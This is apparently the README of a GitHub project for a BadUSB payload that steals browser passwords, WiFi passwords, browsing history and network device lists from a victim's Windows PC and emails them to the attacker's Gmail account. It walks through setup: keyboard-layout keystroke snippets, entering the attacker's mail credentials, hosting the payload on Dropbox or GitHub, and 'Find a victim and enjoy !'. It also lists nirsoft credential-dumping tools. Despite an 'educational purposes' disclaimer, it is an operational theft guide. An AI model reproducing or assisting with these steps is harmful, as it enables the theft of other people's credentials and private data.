Everything in this repository is strictly for educational purposes. Notice I am not responsible for stolen data. You are responsible for your actions using developed script for BadUSB.
This script allows you to steal the following information :
- Browser passwords (Chrome, Firefox, Opera);
- WiFi passwords;
- Browser history from the last 7 days;
- The list of all devices that are connected to victim's network;
Sometimes, you will see something like this :
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press(173);
Keyboard.releaseAll();
This is only to write these characters : "@", "\". But it depends on the computer's layout, so adapt these characters thanks to this site and the sequence you actually use to wirte these characters with your keyboard. (or switch the keyboard layout to French).
For US layout you only have to replace by this for "\" :
Keyboard.press(92);
Keyboard.releaseAll();
And by this for "@" :
Keyboard.press(64);
Keyboard.releaseAll();
You can customize the delay according to the speed in which you plug the BadUSB.
When you plug the BadUSB in a PC you have to wait for the caps lock to flash to unplug it.
-
Have a BadUSB.
-
Install Arduino software here (if you use a BadUSB which is based on arduino);
-
Have a Gmail account and enable less secure app here;
-
Have a victim with Windows OS installed in his PC;
- Download this repository;
Linux :
git clone https://github.com/tuconnaisyouknow/BadUSB_passStealer
cd BadUSB_passStealer
Windows : Click on green button on right top of main page. Then click on "Download Zip" and extract zip file.
-
Replace your mail and password here at line 16, 18, 19;
-
Put the .ino or .txt file in your BadUSB;
-
Find a victim and enjoy !
- Turn off caps lock.
- Switch the keyboard layout to French (or adapt the code according to your layout).
-
Create a dropbox account here;
-
Upload your file;
-
Copy the link of the file and change ?dl=0 by ?dl=1;
-
You will get a link like this : https://dropbox.com/s/link/YOURFILE?dl=1;
-
Create a Github account here;
-
Create a public repository;
-
Upload your file;
-
Go to your file page and click on RAW button;
You can download nirsoft tools below if you want :
- WebBrowserPassView.exe (User : download ; Password : nirsoft123!;
- WNetWatcher.exe;
- BrowsingHistoryView.exe;
- WirelessKeyView.exe;